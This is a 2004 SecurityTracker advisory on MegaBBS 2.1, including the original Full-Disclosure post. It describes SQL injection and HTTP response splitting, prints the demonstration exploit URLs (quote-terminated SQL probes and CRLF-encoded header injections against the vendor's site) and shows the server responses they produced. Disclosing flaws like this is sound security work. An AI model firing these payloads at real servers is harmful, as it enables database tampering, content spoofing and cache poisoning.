SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   MegaBBS Vendors:   PD9 Software
MegaBBS Input Validation Errors Let Remote Users Inject SQL Commands and Conduct Response Splitting Attacks
SecurityTracker Alert ID:  1011420
SecurityTracker URL:  http://securitytracker.com/id/1011420
CVE Reference:   CVE-2004-2145, CVE-2004-2146   (Links to External Site)
Updated:  Jul 2 2005
Original Entry Date:  Sep 27 2004
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 2.1
Description:   Several vulnerabilities were reported in MegaBBS. A remote user can inject SQL commands. A remote user can conduct an HTTP response splitting attack.

The 'ladder-log.asp' and 'view-profile.asp' scripts do not properly validate user-supplied input in certain parameters. A remote user can supply a specially crafted URL to execute SQL commands on the underlying database.

Some demonstration exploit URLs are provided:

ladder-log.asp?categoryid=1&sortby=completeddate&sortdir=1'
ladder-log.asp?categoryid=1&filter=id&criteria=1'
view-profile.asp?type=single&memberid=1'
view-profile.asp?type=team&teamid=1'

A remote user can also submit a specially crafted URL to cause the target server to return a split response. A remote user can exploit this to spoof content on the target server, attempt to poison any intermediate web caches, or conduct cross-site scripting attacks.

Some demonstration exploit URLs are provided:

http://www.pd9soft.com/megabbs/forums/thread-post.asp?action=writenew&fid=%0
d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20
text/html%0d%0aContent-Length:%2033%0d%0a%0d%0a%3chtml%3eScanned%20by%20Maxp
atrol%3c/html%3e%0d%0a&tid=4924&replyto=22947&displaytype=flat

http://www.pd9soft.com/megabbs/forums/thread-post.asp?fid=%0d%0aContent-Leng
th:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aC
ontent-Length:%2033%0d%0a%0d%0a%3chtml%3eScanned%20by%20Maxpatrol%3c/html%3e
%0d%0a&action=writenew&displaytype=flat

Impact:   A remote user can create a URL that, when loaded by the target user, will cause arbitrary content to be displayed.

A remote user may be able to poison any intermediate web caches with arbitrary content.

A remote user can inject SQL commands.

Solution:   The vendor has released a fix, available at:

http://www.pd9soft.com/

[Editor's note: It appears that the vendor has not incremented the version number in the fixed version.]

Vendor URL:  www.pd9soft.com/megabbs-support/index.asp (Links to External Site)
Cause:   Input validation error
Underlying OS:  Windows (NT), Windows (2000), Windows (2003)

Message History:   None.


 Source Message Contents

Subject:  [Full-Disclosure] HTTP Response Splitting and SQL injection in megabbs forum


URL: http://www.pd9soft.com 
Tested megabbs 2.1 

1. HTTP Response Splitting
http://www.pd9soft.com/megabbs/forums/thread-post.asp?action=writenew&fid=%0
d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20
text/html%0d%0aContent-Length:%2033%0d%0a%0d%0a%3chtml%3eScanned%20by%20Maxp
atrol%3c/html%3e%0d%0a&tid=4924&replyto=22947&displaytype=flat

Result:

<...>
HTTP/1.1 302 Object moved 
Connection: close 
Date: Sun, 26 Sep 2004 14:14:02 GMT 
Server: Microsoft-IIS/6.0 
Location: /megabbs/forums/forum-view.asp?fid= 
Content-Length: 0 

HTTP/1.0 200 OK 
Content-Type: text/html 
Content-Length: 33 

<html>Scanned by Maxpatrol</html> 

Content-Length: 290 
Content-Type: text/html 
Expires: Sun, 26 Sep 2004 14:13:02 GMT 
Set-Cookie: guestID=309; path=/ 
Set-Cookie: ASPSESSIONIDAQRTADCB=KNEIJIEDEMJPNNKPNFONOIFL; path=/ 
Cache-contro
<...>


2. HTTP Response Splitting
http://www.pd9soft.com/megabbs/forums/thread-post.asp?fid=%0d%0aContent-Leng
th:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aC
ontent-Length:%2033%0d%0a%0d%0a%3chtml%3eScanned%20by%20Maxpatrol%3c/html%3e
%0d%0a&action=writenew&displaytype=flat

Result:
<...>
HTTP/1.1 302 Object moved 
Connection: close 
Date: Sun, 26 Sep 2004 14:34:05 GMT 
Server: Microsoft-IIS/6.0 
Location: /megabbs/forums/forum-view.asp?fid= 
Content-Length: 0 

HTTP/1.0 200 OK 
Content-Type: text/html 
Content-Length: 33 

<html>Scanned by Maxpatrol</html> 

Content-Length: 290 
Content-Type: text/html 
Expires: Sun, 26 Sep 2004 14:33:05 GMT 
Set-Cookie: guestID=421; path=/ 
Set-Cookie: ASPSESSIONIDAQRTADCB=HCGIJIEDMBPIHPCDJFKACJAC; path=/ 
Cache-contro
<...>

3. More and more SQL injection:
ladder-log.asp?categoryid=1&sortby=completeddate&sortdir=1' 
ladder-log.asp?categoryid=1&filter=id&criteria=1'
view-profile.asp?type=single&memberid=1'
view-profile.asp?type=team&teamid=1'


MaxPatrol is a professional network security scanner distinguished by its
uncompromisingly high quality of scanning, optimized for effective use by
companies of any size (serving from a few to tens of thousands of nodes).
MaxPatrol developers were able quite simply to "ignore" about 40% of the
newly published vulnerabilities because their product's intelligent
algorithms had already detected them.
http://www.Maxpatrol.com


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC